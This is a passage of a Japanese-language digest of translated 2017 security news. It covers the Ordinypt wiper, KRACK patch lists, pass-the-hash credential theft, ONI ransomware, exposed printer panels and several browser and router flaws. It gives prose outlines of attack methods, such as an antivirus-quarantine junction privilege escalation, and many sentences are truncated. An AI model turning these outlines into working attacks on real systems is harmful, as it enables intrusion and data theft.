Step 6 - 感染したファイルは、その場所に送り返されるが、NTFSジャンクションは、そのファイルを C:\Windows 内部の重要なフォルダに中継する。非管理者権限のユーザは、このフォルダの内部にあるファイルをコピーできないが、アンチウィルス・プログラムは、システム権限の下で動作している。このことは、隔離室から復元されたファイルが、エラーや警告を発生させることなしに、そのフォルダに送られることを意味している。
Step 7 - Windowsのサービスの一部やコアプロセスは、特定のWindowsディレクトリに格納されている全てのDLLをロードするように設計されているため、ユーザが彼のPCを次回に再起動した時、今まで隔離されていたファイルは、Windowsサービスやホワイトリストされたアプリケーションとしてスタートアップで実行される。
 攻撃全体は、ブート永続性と特権の昇格の両方を可能にしているため、恐ろしく狡猾であるが、そのマシンに物理的にアクセス可能(殆どの場合、重大な制限)な攻撃者に依存している。
Ordinypt身代金要求型マルウェアは故意にファイルを破壊する。現在のターゲットはドイツ  BleepingComputer : News>Security (2017/11/09) Michael Gillespie によって最初に発見された。この月曜日、G Dataのセキュリティ研究者Karsten Hahn は、サンプルを解析し、ドイツ語で書かれたeMailを介してドイツ人ユーザだけをターゲットにし、間違いのないドイツ語で脅迫文が配布されていることを発見した。Petya身代金要求型マルウェア が配布される方法に類似して、Ordinyptもまた、求人広告に応募するために送信された履歴書であるかのように装っている。これらのeMailは、二つのファイル(履歴書を送信しているかのような婦人のJPG画像と、履歴書と職務経歴書を含むZIPファイル)を含んでいる。
 このZIPアーカイブは、それらが異なるファイルであると思わせてユーザを欺く、使い古された二重拡張子とカスタムアイコン・トリックを使用する二つのEXEファイルを含んでいる。このケースでは、PDFファイル。
Ordinyptはファイルをランダムなデータで置き換える 
 何れかの実行ファイルを実行することは、Ordinypt身代金要求型マルウェア(いっそのこと、Ordinyptワイパー)を起動する。Ordinyptは、実際にはワイパーである。何かを暗号化して悩ませるのではなく、ファイルをランダムなデータで単に置き換えるだけなので、身代金要求型マルウェアではない。
9 Nov
Replying to @demonslay335 and 4 others
Philipp Mackensen @PMackensenによる投稿
File names and content are generated by the same function (only needs a length as input) which randomly generates a string that consists of uppercase, lowercase and numeric characters . File size can differ between 8KB and 24KB (also random). Doesn't  encrypt .png files tho.
 Philippは更に、このワイパーは、あらゆる他の身代金要求型マルウェアのように、ファイルの検索を実行するが、「実際にはゴミ・ファイルである"pseudo-encrypted-file"(擬似暗号化ファイル)を作成し、その後、オリジナルのファイルを削除するだけである」と、Bleeping Computerに告げている。Philippは更に、このマルウェアがワイパーであるという事実を隠蔽している間、このマルウェアは、ほぼ間違いなく、身代金要求型マルウェアのように動作していると、続けている。
 Ordinyptは、新しいファイルが時々オリジナルのサイズの半分を超えるが、その有害な性質を隠そうともしない。
 Ordinyptは、ファイルを破壊した全てのフォルダに脅迫文をドロップする。この脅迫文は、Wo_sind_meine_Dateien.htmlと名付けられている。英文に翻訳するとWhere_are_my_files.html.(私のファイルは何処)である。
Ordinyptは身代金要求型マルウェアを装うワイパーである 
 故意にデータを破壊する挙動は、脅迫文がコード化されていることからも明らかである。
JavaScript(画像をクリックすると拡大します。)
ハードコードされたウォレット・アドレス(画像をクリックすると拡大します。)
 更に、この模造身代金要求型マルウェアの作者に接触し、支払いを確認する方法は存在しない。全ての証拠は、誰かが、コンピュータに故意にダメージを与えるために、Ordinyptをコーディングしたことを指摘している。NotPetya である。
IOC 
Ordinypt / HSDFSDCrypt Hash: 
SHA256: 085256b114079911b64f5826165f85a28a2a4ddc2ce0d935fa8545651ce5ab09
Ordinypt / HSDFSDCryptスパムeMail文(Bleeping Computerによる英文翻訳) 
Dear Sir or Madam,
Enclosed you will receive my application for your job advertised at the Employment Agency. Please see my detailed and attached application documents for the reasons why I am able to fill the vacant position optimally and that your experience has many advantages for your company.
I'm glad if I can introduce myself once again.
Best regards,
Viktoria Henschel
Ordinypt / HSDFSDCrypt脅迫文 
ブラザーのプリンターは、RDoS(リモートDoS)攻撃を許容する  Kaspersky : ThreatPost (2017/11/07) この問題を公開 した。Threatpostによるコメントの要求は、無視されたまま公開された。
TorMoil脆弱性は、Torブラウザユーザの実IPアドレスをリークする  BleepingComputer : News>Security (2017/11/03) TorMoil と名付けられた)を内密に通知した。Tor Project開発者は、修正をリリースするためにFirefoxチーム(TorブラウザはFirefoxをベースにしている)と共同作業した。
IPリークは、"file://"リンクで発生していた 
 Cavallarinによると、この問題は実際には、Firefoxがfile:// URL を取り扱う方法におけるFirefoxのバグである。この問題はFirefoxにとっては無害であるが、Torブラウザにおいては壊滅的である。
TorMoilはオンラインで未だに悪用されていない 
 「我々は、この脆弱性がオンラインで悪用されていることを認識していない」と、Tor Projectは本日の声明中で発言している。それであるにも拘わらず、攻撃者はTorブラウザのバイナリをリバースエンジニアリングし、パッチされたコードを検出することができる。精通したプログラマは、大変簡単に、そのバグが発生する方法を理解し、そのバグを悪用するためのプログラムを作成することができる。Torブラウザの開発者によると 、ユーザは、そのリンクを、新しいタブにドラッグ・ドロップすることで file:// URL を開くことが可能である。
ChromeのImage Downloaderアドウェア拡張に注意せよ  BleepingComputer : News>Security (2017/11/01) Image Downloader (これへのリンクは直ぐに排除された)と呼ばれる新しいChrome拡張について告げる。詳しい検証で、この拡張は、あなたが訪問しているWebサイトに広告を挿入し、あなたがそのサイトと相互作用すると、新しいタブで不快なサイトを開き、そして、検索エンジンの結果ページの先頭に広告を挿入するアドウェアである。説明するビデオ を見ることができる。
挿入された広告
 助言として、あなたが本当に必要な拡張だけをダウンロードし、それをインストールする前に、その拡張のパーミッションを常にチェックするようにしなさい。悪意ある拡張は、一般的に、あらゆるWebトラフィックを改竄するために全パーミッションを取得しようとする。これは大部分の拡張には必要のないものである。必ずセキュリティプログラムのアップデートをインストールしなさい。HybridAnalysis やVirusTotal に、拡張をアップロードしなさい。
Bootkit身代金要求型マルウェアの悪漢共は、日本のBadRabbitセキュリティホールに飛び込んでいる  The Register : Security (2017/10/31) 
 我々は、ONI身代金要求型マルウェアが、精巧なハッキング操作を隠蔽するワイパーとして使用された可能性を疑っている。これらの標的型攻撃は、3から9ヶ月にわたって継続し、全ては、一度に数百のマシンを暗号化しようとする試みで終了した。
 Cybereasonによると、MBR-ONIは、同じ一連の攻撃において、ONI(身代金要求型マルウェアの早期の株)と関連して使用されている。一緒に配備することはもちろん、不快な二つの株が「同じeMailアドレス」を共有することであると、研究者達は主張している。一方のマルウェアが、同じ目的を達成した時、同一の攻撃で身代金要求型マルウェアの二つの株を使用することは、Cybereasonと他の興味を持つオブザーバ達の双方にとって謎のままである。Shamoon 攻撃が含まれる。Ammyy Admin RAT を投下するように設計されている)を運ぶために、スピア型フィッシングeMail(【訳注】 全く同じ内容のメールを大量に不特定多数のアドレスに送り付けるのではなく、攻撃相手のことをよく研究し、ごく自然に感じられる件名や本文、添付ファイル名などが付される(ESETマルウェア情報局より))を装っているようである。マルウェアのペイロードは、eMail中のパスワードで保護された汚れたZIPファイルによって運ばれる。誰かがZIPファイルを開いた時に予期される特徴は、RATをダウンロードし実行するためのVBScriptを可能にするために、マクロを有効にするように誘導してくることである。
日本での身代金要求型マルウェア攻撃の段階
 Cybereasonは、ハッカー共がネットワークを介して拡散するために、他のツールとNSA(米国国家安全保障局)から流出したEternalBlue脆弱性悪用プログラムとを結合して使用していると発言している。データ損壊と攻撃の成功に伴うログの削除は、上述のことを証明するものではないが、Cybereasonは、MS17-010アップデート(2017年3月にリリースされた)が、セキュリティ侵害されたマシンにはインストールされていないことを発見している。更に、SMBv1は、セキュリティ侵害された環境にわたって有効にされたままであった。結論 している。
Botnote 
 ONIは、暗号化したファイルに追加するファイル拡張子に基づいてその名前を与えられた。名前のONIは、日本では“devil”(鬼)を意味する、そして、これは、脅迫文中に見出されるeMailアドレスに表示されてもいる。“Oninoy0ru”は、“Night of the Devil”(鬼の夜)と翻訳される。Cybereasonは、他のeMailアドレス(ユーザ名に文字列“ONI”が存在する)を含むONIの脅迫文の別のバージョンを監視している。
ハッカーはユーザと対話することなく、Windowsログイン認証を盗むことができる  BleepingComputer : News>Security (2017/10/27) 
共有フォルダを持つ全てのコンピュータに脆弱性があるわけではない 
 パスワードで保護されている共有フォルダ付きのコンピュータは安全である。これは、WindowsのDefaultのオプションなので、殆どのユーザは、この攻撃に対して脆弱ではない。
共有オプション
Windows 10とServer 2016だけパッチが利用可能である 
 このハッキングは、アメリカ人のセキュリティ研究者Juan Diego(4月にこの問題をMicrosoftに通知した)によって発見された。ADV170014 セキュリティ・アドバイザリで、この攻撃ベクトルをパッチした。このパッチは、Windows 10とWindows Server 2016ユーザ用だけである。
脆弱性への攻撃ルートは解明されていない 
 Bleeping Computerとの会話で、ADV170014は、彼が発見したこのハッキングをブロックするが、そもそも、このハックが可能である理由を、Diegoは説明できなかった。
Microsoftのパッチは、pass-the-hash攻撃を解決しようとしている 
 Microsoftが配布したパッチは、実際には、Diegoが説明不可能とするSCF自動実行を修正するものではないが、pass-the-hash (ユーザのネットワークの外部にあるサーバとNTLMハッシュの自動共有。Diegoも、このハックで採用したテクニック)として知られる20年前の攻撃をパッチしようとしている。ChromeとSCFファイルを結合 させている。他の最近のpass-the-hash攻撃に関しては、2016年 と2015年 で公開されている。Stefan Kanthak (彼もまた2017年3月に類似のバグを通知している)であった。彼のブログ で可能である。
URSNIFバンキング・トロイが日本で拡散している  Kaspersky : ThreatPost (2017/10/26) 木曜日にリリースされたS-Forceのレポート は述べている。
2017年における攻撃ボリュームあたりの拡散しているバンキング・トロイ ファミリー
 2010年の末にかけて、オリジナルのUrsnifは、ヨーロッパ、イギリス、アメリカの主要銀行をターゲットにしていた。2017年まで早送りすると、Ursnifは現在、北アメリカ、オーストラリア、日本のターゲットに追加して、ブルガリア、ポーランド、スペイン、チェコ共和国の銀行をターゲットにしている。検出 した。Sandbox環境が検出されると、ブービートラップされた添付ファイルは、彼らのペイロードを配布しないだろう。
攻撃者は、SSHセキュリティ・コントロールの欠乏に関するレポートの後、SSH鍵のスキャンを開始  BleepingComputer : News>Security (2017/10/19) 
秘密鍵のスキャンは突然始まった 
 Wordfence(米国に本拠を置くWordPressセキュリティ企業)は、昨晩、攻撃者達が、SSH秘密鍵を探している可能性を暗示するフォルダ名で、巨大なスキャンを行っていることに気がついた。レポート を公開したWordfenceのCEO Mark Maunderは、発言している。
SSH秘密鍵のスキャン
危険なSSH設定は、このスキャンの引き金になったとするレポート 
 この突然の上昇は、Venafi(IDentity Protectionサービスのプロバイダ)によって、今週初めに公開されたレポート によっても説明される。
鍵の研究は、以下を発見した: 
✈ 応答者の61%が、SSHを管理する管理者の数を制限も監視もしていない。35%だけが、悪意に満ちたインサイダーの誤用が、組織を盲目にしたままにするので、SSHユーザに、彼らに認証されているキーの設定を禁止する方針を実行している。
 Webサイトのオーナーは、彼らが公開サーバにSSH秘密鍵を偶然アップロードしているか否か、あるいは、SSH秘密鍵をGitやSVNレポジトリに収容したか否かチェックすることがアドバイスされている。SSH秘密鍵にアクセスするパスフレーズを設定することもまた、攻撃者が、この鍵を使用することを妨げる(たとえ、攻撃者が、どうにかしてそれを手に入れたとしても)。
KRACK(Key Reinstallation Attack) WiFi攻撃から自分自身を守る方法  Bitdefender : Hot For Security (2017/10/19) 全てのWiFi接続デバイスに、攻撃に対する脆弱性が残ったまま になっていたということである。そこで、我々は、Wi-Fi Alliance(【訳注】 無線LAN製品の普及促進を図ることを目的とした業界団体(Wikipediaより))が修正を用意するまで、ユーザが、リスクを軽減するために採用できる簡単なステップを提示する。計画を立案 しているが、この脆弱性は、WPA2が完全にパッチされるまでの暫くの間、継続している。リスト さえ公開した。Wi-Fi allianceと製品ベンダは、急いでパッチを用意しているので、あなたが実行できることを以下に掲げる。
既に利用できる、あらゆるアップデートとパッチをインストールする 
 あなたのベンダが、パッチを既に利用できるようにしているのであれば、それを入手しなさい。パッチの取得とインストールは簡単ではないかもしれないが、あなたのデータとプライバシーを大切に思うのであれば、パッチするための努力をしなければならない。一般的に、ルータは、ベンダのWebサイトを訪問し、パッチをダウンロードし、Webツールを介してルータにパッチを入力することで、手動でパッチする必要がある。
AES暗号化を使用する 
 AESとTKIP共にKRACK対して脆弱性がある。しかしながら、AESは、パケットの挿入に対する脆弱性がないので、それがAES(TKIPではない)で暗号化されている限り、ある程度の心の平安と共にWPA2を使用し続けることができる。
HTTPSで安全にされ、且つ / もしくは VPNを使用しているWebサイトだけを訪問しなさい 
 HTTPSは、その独自のセキュリティ・レイヤーを取り決めているので、HTTPS(TLS)で安全にされた全てのWebサイトは、理論的には訪問しても安全である。より大きな心の平安のためには、入出力の伝達の暗号化に信頼あるVPNサービスを使用しなさい。HTTPサイトは、KRACKだけでなく、一般的に安全ではない。
可能なら、よりリスクの低いデバイスを使用する 
 KRACKが明るみに出ると直ぐに、実際にWiFiを介して送受信する全てのデバイスに脆弱性が確認された。しかしながら、Vanhoefは、OSのバージョン6.0以降で稼働しているAndroidデバイスは、欠陥のあるWPA2を実装しているために、最も脆弱性があると発言している。この件が解決されるまでは、非Androidデバイスを使用したほうが良いだろう。もちろん、これは解決策ではないが、異なるOSを搭載している複数の電話とタブレットを二刀流で使用している人々に関しては、単純に「より安全」なオプションである。
公共のWiFiを回避し、家庭や仕事ではEthernetを使用する 
 公共のWiFiホットスポットは、この時点で最も脆弱なので、できる限りそれらを回避しなさい。家庭と仕事場では、あなたのコンピュータが可能であるのなら、有線ネットワークを使用しなさい。これは、WiFiを介してWebに接続する代わりに、あなたのコンピュータにEthernetケーブルを接続することを意味している。
Windowsをアップデートする 
 あなたが、Windows PCのユーザであるのなら(我々の読者の殆どがそうだろうが)、Microsoftの10月のアップデートが、KRACKに対してWindows 10を保護している。Microsoftに準拠しているソフトウェアメーカーは、これをWindows Central へのステートメントで確認している。
 「Microsoftは、10月10日にセキュリティアップデートをリリースした。Windows Updateを有効にし、セキュリティ アップデートを適用した顧客は、自動的に保護される。我々は、可能になると直ぐに顧客を保護するためにアップデートしたが、責任ある産業パートナーとして、我々は、他のベンダがアップデートを開発しリリースできるようになるまで、公開を差し控えた」と、Microsoftは発言している。
 あなたのPCが自動アップデートを有効にしているなら問題ないが、そうでないのであれば、Windows Updateを介してパッチを手動で入手する必要がある。我々は、あなたが、直ぐにこれを実行するよう提案する。
Apple並びに他のOSのユーザに関して 
 Appleは、報道機関に対して、KRACK用のパッチを含むiOS, macOS, watchOS, tvOSの新しいバージョンをベータテスト中であることを認めている。けれども、最終バージョンがリリースされる時期に関しては、何も発言されていない。一般的に、Appleは、そのプラットフォーム用のベータOSのテストに、少くとも2ヶ月をかけている。信頼あるアンチウィルス ソリューション を稼働しなさい。ハッカーが成功裡にKRACK攻撃を配備し、攻撃者が、あなたを悪意ある、あるいは、不正なWebサイトにリダイレクトしようとした場合でも、あるいは、あなたのシステムに悪意あるファイルを投下しようとした場合でも、あなたは未だ、あなたの側にアンチマルウェア ソリューションを持っている。
KRACK(Key Reinstallation Attack) WPA2脆弱性に関するファームウェアとドライバ・アップデートのリスト  BleepingComputer : News>Security (2017/10/16) 
【訳者より】 このリストは、米国東部時間 2017年10月16日 17:25(日本時間、2017年10月17日 07:25)現在のものです。最新情報は、コチラ を参照してください。
 多くの人が読んでいる、あるいは、直ぐに読むだろうが、WPA2ワイアレス・プロトコルにKrack と呼ばれる脆弱性が存在している。この脆弱性は、ワイアレス接続を盗聴し、マルウェアをインストールしたり、Webページをセキュリティ侵害するためにワイアレス ストリーム中にデータを挿入することを攻撃者に可能にするものである。このページ をチェックするよう、あなたにアドバイスする。このページは、ベンダに接触して得た情報、CERT情報ページ 、他のソースからの情報を含んでいる。
情報が利用可能な企業 
Arch Linux コチラ とコチラ で発見できる。
Amazon 
Apple 
 会社を代表して話すことを認められていないApple内部の情報筋は、ハードウェア感受性を削除するためのパッチは、OSの現在の範囲の「直前の」ベータに含まれていた(月曜のバッチの前のリリースを意味する)とAppleInsiderに告げている。しかしながら、我々の情報源は、AirPortハードウェア(Time Machine, AirPort Extremeベース ステーション,AirPort Expressを含む)、は利用できるパッチを持っていないと、そして、それが進行中であるか否かも定かでないと指摘している。
Aruba Networks コチラ とコチラ で発見できる。FAQ も同様にポストされている。
Belkin, Linksys, Wemo 
 「Belkin, Linksys, Wemo(【訳注】 ベルキンが展開している三種類のブランド)は、WPA脆弱性を認識している。我々のセキュリティ チームは、詳細に検証している、そして、適切に勧告するだろう。我々は顧客ファーストであることを約束し、求めに応じられるよう、どのようにして顧客が製品をアップデートできるのかに関して、我々のセキュリティ・アドバイザリのページに指示を投稿することを計画していることを理解されたい。」
Cisco アドバイザリ と、脆弱性のある製品のリストをリリースした。Ciscoは、IOSとドライバ アップデートは開発中であり、リリースされるだろうと述べている。Cisco製品のユーザは、この先アップデートされる可能性があるので、頻繁にアドバイザリをチェックするようにアドバイスされている。
DD-WRT DD-WRT SVN に存在している。けれどもパッチされたファームウェアがダウンロード可能か否か、現在分かっていない。
Debian アドバイザリ をDebian Security Announceメーリングリストに投稿している。
Dell 
Espressif ESP-IDF , ESP8266 RTOS SDK , ESP8266 NONOS SDK 用のアップデートを彼らのGithubのページ にリリースしている。
Fedora Fedora 25 アップデートを持っている。Fedora 26 とFedora 27 アップデートは、安定版リリースへの追加待ちである。
FreeBSD FreeBSD-Announceメーリングリスト に参加するか、Security Informationページ を監視するかの、どちらかをしなければならない。
Fortinet このドキュメント によると、FortiAP 5.6.1が、KRACK脆弱性を修正したリリースである。
Google 
Intel アドバイザリ をリリースした。これには、アップデートされたドライバへのリンクが含まれている。
Lede 述べて いる。OpenWRTに関しては何も発言していない。
LineageOS パッチ を持っている。
Linux コチラ で発見できる。
Meraki 802.11r Vulnerability (CVE: 2017-13082) FAQ )に発見される。
Microchip Technology アドバイザリ を投稿した。
Microsoft 修正 していた。
MikroTik によると 、「RouterOS v6.39.3, v6.40.4, v6.41rcは影響を受けない! APモードデバイスは影響を受けない。実装された全ての修正は、ステーションとWDSモードにのみ言及される。」 彼らは更に、ファームウェアバージョンは、この問題を修正するために先週リリースされたと述べている。
Netgear アドバイザリ をリリースしている。
OpenBSD コチラ とコチラ で読むことができる。
Open-MeshとCloudTrax アドバイザリ は、Krack脆弱性に関連したOpen-MeshとCloudTraxに関して投稿された。アップデートは、10月17日までに自動アップデートを使用して、これらの全てに対して配布されることが予定されている。アドバイザリに詳細。
pfSense 版 を始めた。
Qualcomm 
 「頑強なセキュリティとプライバシーをサポートするテクノロジを提供することは、Qualcomm Technologies, Inc.にとって最重要である。我々は、Qualcomm-powered製品中で再使用されるWPAパケットナンバーを改善するために、オープンソースセキュリティ問題を持つ全てのインプレメンテーションを同定し解決するために産業パートナーと共同作業している。この問題のパッチは、
Code Aurora Forum と、他のディストリビューション チャンネルで現在利用可能であるし、追加のパッチは、我々の品質保証プロセスで検証されると、直ちにポストされる。」
Red Hat アドバイザリ を作成している。利用できる更なる詳細は存在していない。
Sierra Wireless CERT からのリンク。
Sonicwall 
Sophos アドバイザリ をリリースし、Sophos UTM Wireless, Sophos Firewall Wireless, Sophos Central Wireless, Cyberoam  Wireless製品が、Krack脆弱性の影響を受けると述べている。これらの製品のアップデートは直ぐにリリースされるだろう。
Synology アドバイザリ をポストしている。Synologyによると、影響を受ける製品用のアップデートは直ぐにリリースされる。
東芝 Canvio AeroMobileワイアレスSSD 製品が影響を受ける。東芝は、プリンタに関しては、所有者とビジネスパートナーに直接接触することにしている。そして、ワイアレスSSDカードに関しては、ファームウェア アップデートが行われる。
TP-Link 
Turris Omnia パッチ は彼らが修正をテストしリリースする予定のレポジトリに追加されたと投稿 している。願わくば、これが、同様に早急にOpenWRTのアップデートのリリースを導かんことを。
Ubiquiti リリース している。
Ubuntu アドバイザリ をリリースしている。
WatchGuard アドバイザリ をリリースしている。
WiFi Allianceの告知 告知 をリリースしている。
Zyxel ページ を作成している。彼らは、この脆弱性を修正するための作業中であるが、利用可能はドライバやファームウェアのアップデートは存在していない。
KRACKの影響を受けないと主張する企業 
Arista Networks, Inc.
情報提供をしていない企業 
Juniper Networks
サイバースパイ グループが日本企業に対するキャンペーンをセットアップ  Kaspersky : ThreatPost (2017/10/14) 今週リリースされた レポートにおいて、SecureWorksは、このグループによって使用された戦術及び戦略の推移を明らかにした。研究者によると、ユニークなマルウェアツールを開発するために、0-Dayの悪用を思いつくと、Bronze Butlerは、その知識と経験を増強し、日本のシステム管理者によって使用されるデスクトップ管理ツールを悪用することで益々効果的にしてきていた。
 Palo Alto NetworksのUnit 42で7月24日に 公開されたレポートよると、Bronze ButlerのDaserfマルウェアは、類似のバックドアMinzenだけでなくGh0st RATやダウンローダーHomamDownloaderと共謀し9002 RATとして特定されるRATと共に共有インフラを監視していた。
Android用の身代金要求型マルウェアDoubleLockerは、データを暗号化しPINを変更する  The Register : Security (2017/10/13) DoubleLocker は、小狡い感染メカニズムと、犠牲者から金銭を強請り取る二つの強力なツールを結合している。
DoubleLockerの脅迫状
 この身代金額は、比較的穏当な 0.0130 Bitcoin(凡そ 54$(概ね6000円))に設定されている。DoubleLockerの非ルートデバイスをクリーンにする唯一の実行可能なオプションは、工場出荷状態にリセットすることである。ルートデバイスのPINロックを回避することは、簡単ではないが可能である。暗号化されたファイルは簡単に復元することはできない。
Outlookは、S/MIME暗号化を使用すると、eMailを暗号化しないかもしれない  BleepingComputer : News>Security (2017/10/11) 
・ 
S/MIME 公開鍵暗号化基準で暗号化されたeMailだけが影響を受ける。PGP/GPGは、影響を受けない。
・ 暗号化されたeMailのリークは、Outlookを使用して送信されたeMailのみに発生する。Outlookで受信した場合ではない。
・ このリークは、plaintext(平文)で送信されたOutlook eMailにのみ発生する。DefaultのOutlook設定は、HTMLフォーマットを使用している。
・ リークは、ユーザがplaintext(平文)eMailに対する返信を暗号化しようとした時にも発生する。Outlookは、そのようなeMailに返信するとき、DefaultのHTMLフォーマットを、自動的にplaintext(平文)に変更する
・ このリークは、ユーザが、SMTPサーバでOutlookを利用している場合には、常に発生する。
・ このリークは、Microsoft Exchangeインフラストラクチャを使用しているOutlookクライアント用の一つのサーバーホップ(【訳注】 ホップ数: 目的のサーバーに接続するために、プロバイダーのルーターなどを経由していく数(ASCII.JPデジタル用語辞典より))にだけ発生する。これは、暗号化されたeMailのリークを企業ネットワーク内部に制限する。TLSは、eMail通信に関しては無効化されざるを得ない。
・ リークはまた、受信者のeMailクライアントでも発生する。eMailクライアントは、eMailメッセージのプレビューを表示するので、たとえ攻撃者が、標的の秘密鍵へのアクセスを持っていない場合でさえ、攻撃者は、暗号化されたメッセージの内容を閲覧することができる。例えば、犠牲者のeMailパスワード(犠牲者のS/MIME秘密鍵ではない)へのアクセスを取得した攻撃者は、犠牲者が受け取った暗号化されたメッセージ(リークしやすいOutlookを実行しているユーザによって送信された)の一部を読むことができる。
 たとえ、上述のシナリオに限定された場合でさえ、暗号化リークは重要な問題である。企業は、重要な情報をeMailで交換するとき、この情報を守るために暗号化を使用する。殆どのバグと脆弱性の報告も、暗号化されたフォーマットで処理されている。
Microsoftは、真の影響について口を閉ざしている 
 SEC Consultの研究者は、今年前半、偶然にOutlook S/MIME暗号化eMailのリークを発見した 。他のユーザも、一ヶ月後、Microsoftのフォーラムに同じ問題を通知した 。CVE-2017-11776 )に関する修正を、昨日の2017年10月のPatch Tuesday でリリースしたと、発言している。
Microsoftは、コッソリWindows 10のセキュリティホールを修正したが、Windows 7,8は、寒空の下に放置されている  The Register : Security (2017/10/06) この問題に関してブログで公開した ので、彼らは今、認識するだろう。問題の一例 として、Jurczykは、カーネル中でのmemset()の不安定な使用に焦点を当てている。これは、メモリの特定領域中のバイトを特定の値(0のような)で上書きすることを前提としている関数であり、それ故、メモリのその部分に今まで格納されていたものが何であれ取り去る。修正 された。Googleは、公開する前に、開発者と企業に行動を起こさせるために、一般的に、通知されたセキュリティ上の欠点を解決するために90日の猶予をベンダ(Microsoftを含む)に与えている。
Dnsmasq脆弱性はホーム・ルータとIoTデバイスを危険に晒している  Bitdefender : BOX (2017/10/06) ブログポスト に於いて、Googleの研究者は、通常のインターネットセキュリティ検証を行っている間に、Dnsmasq中に「7つの異なる問題」を発見したと説明している。
 このフローの一つは、"trivial-to-exploit"(悪用するには些細な)DHCPベースのバッファオーバーフロー脆弱性として説明されているが、他の情報漏洩用の脆弱性攻撃と結合することで、システムの防御をバイパスし、リモートコード実行を獲得できる。何度も 見てきたように、悪意あるハッカーは、
DDoS攻撃のような犯罪行為を支援し、セキュリティ保護が不十分なIoTデバイスの制御を掴むことが、いとも簡単であることを理解している。10月のAndroidの月例セキュリティアップデート にも含まれている。
数百のプリンターがバックエンド・パネルとパスワード・リセット機能をオンラインに晒している  BleepingComputer : News>Security (2017/10/05) NewSky Security の主幹研究員Ankit Anubhav によって発見されたこれらのプリンタは、インターネットを介して、それらの管理パネルへの完全なアクセスを提供する。
研究者は影響を受ける組織に通知することを計画している 
 「私は大変多くの知名度の高い大学がこのリストに含まれていることに驚いている」と、AnubhavはBleeping Computerとの個人的な会話の中で発言している。Victor Gevers に、このリストを転送した。Geversは、GDI Foundation (脆弱性、マルウェア、他のサイバー脅威によって影響を受ける組織に通知することに特化した非営利団体)の議長である。
管理パネルを広汎に開きっぱなしにするインターネットの脅威 
 昨日、Virus Bulletin 2017セキュリティ・カンファレンスで、雑誌Virus Bulletinの編集者Martijn Grootenは、セキュリティ実行者は、リスクを明確に伝える責任を持っていると発言 している。
ブラザーのプリンタの管理パネル
ファームウェア攻撃は簡単である 
 AnubhavがBleeping Computerに提供したリストは、ブラザープリンタのパスワード・リセット・セクション固有の"password.html"ファイルを露出するデバイスだけしか含んでいない。一部のこれらプリンタ用のパネルはまた、ファームウェアアップデートの検証とトリガーのためのオプションを含んでいる。
NetGearがルータ、スイッチ、NASデバイス中の50の脆弱性を修正  Kaspersky : ThreatPost (2017/10/02) 彼らのWebサイト に投稿している。先週パッチされた脆弱性 の内の一部を発見していたことを認めている。この問題の一つは、1.4.3-17(x86)と1.1.4-7(ARM)以前のバージョンを実行しているReadyNAS Surveillanceアプリケーション中のコマンド・インジェクション脆弱性であった。コマンド・インジェクション攻撃は、ホスト・オペレーティングシステム上で、システム・シェルにデータ(フォーム、クッキー、HTTPヘッダ)を提供する危険なユーザの通過を促進するものであり、脆弱性あるアプリケーションを介して任意のコマンドを実行できる。Trustwave の研究者Martin Rakhmanovと、ON-X Securityの研究者Maxime Peterlinが、Netgear製品中の脆弱性を発見していたこともまた認められたと追加している。PSV-2017-1209 )は、コマンドインジェクション・セキュリティ脆弱性であり、脆弱性のあるファームウェアを実行中の17の消費者向けルータに関連している。バグバウンティ・プログラム (Bugcrowdとのパートナーシップで一月に起動した)を介して通知されたと、Threatpostに告げている。開始以来、この会社は、このプログラムを介して幾つかの公開を行ってきた(今年初めに報道された数十万台のNetgearルータ に発見されたパスワード・バイパスのバグを含む)。1ダースの緊急の脆弱性 があることを発見した。4月、IOActiveの研究者は、Linksysルータのモデルに、サードパーティーに再起動やロックアウトを可能にしたり、影響を受けるデバイスから重要なルータのデータを抽出することを可能にする20を超える脆弱性 を発見した。ASUSは、人気のあるRTルータの30モデル に脆弱性が存在していることを5月に報告した。
WordPressの3つのプラグインに0-Dayの脆弱性  BleepingComputer : News>Security (2017/10/02) セキュリティ警告 によると、ハッカーはWordPressのサイト上にバックドアをインストールするために3つの0-Dayのフローを悪用している。
0-Dayは、脆弱性のあるサイトにバックドアをインストールすることをハッカーに可能にする 
 「この脆弱性は、攻撃者が、リーモート・ファイル(PHPバックドア)を取ってきて、それを彼らの選択した場所に保存することを脆弱なWebサイトに発生させることを可能にする」と、Wordfenceの研究者Brad Haasは発言している。
21,000サイトに脆弱性がある 
 Wordfenceは、一連のハッキングされたサイトを調査し、これまでの悪用の証拠を発見した後、0-Dayを検出したと発言している。9.8/10  のスコアである。これは大変高い値であり、「緊急」に分類される脆弱性である。
Internet Explorerのバグは、URLアドレスバー中にユーザがタイプしたことをリークする  BleepingComputer : News>Security (2017/09/27) 
ロードは中止された。
 MicrosoftのInternet Explorerは、ユーザが、URLアドレスバー中にタイプしていることを検出することを、ペテンにかけようとするサイトに可能にする深刻なバグによる影響を受けている。
バグは簡単に悪用することができる 
 このバグは、IEが(1)悪意あるHTMLオブジェクトタグ付きや、(2)ソースコード中に互換メタタグを特徴として備えているページをロードした時に発生する。この二つの条件を満足することは大変簡単である。
バグはIEが惑わされることで発生する 
 Caballeroによると、JavaScriptコードが悪意あるオブジェクトHTMLタグ中で実行されると、「そのロケーションオプジェクトは混乱し、それ独自のロケーションの代わりにメインのロケーションを戻す。」技術的記事 に於いて、(ユーザが)「アドレスバーにタイプしたことを知る」ために、悪意あるオブジェクトは、「ユーザがメインページを離れている間に、そのオブジェクトのlocation.hrefを取得する」ことができると、Cavalleroは発言している。デモページ をセットアップした。攻撃のデモビデオもまた、以下に埋め込まれている。
攻撃のデモビデオ 
 Cavalleroは、このバグをMicrosoftに通知していない。Bleeping Computerは、コメントを出すためにMicrosoftに手を差し伸べた。IEのバックグラウンドに存続し、実行し続ける ことを、悪意あるJavaScriptコードに可能にするIEのバグを発見している。このバグは、ユーザが悪意あるサイトを訪問した後暫くしてMonero(仮想通貨の一つ)を採掘するために、ユーザのコンピュータリソースを活用する仮想通貨採掘管理ソフトを配布するための悪意ある広告キャンペーンによって乱用される可能性がある。そこで、ユーザのコンピュータはスローダウンし、ユーザのプロセッサの早期摩耗を発生する。1 , 2 , 3 , 4 ]中に多くのセキュリティ・バグを発見している。この内の幾つかを、Microsoftは解決しているが、他は未だである。
FacebookをハイジャックするFacelikerが急増  Graham Cluley : News (2017/09/27) 2013以降 活動している。補足を明らかにしている 。
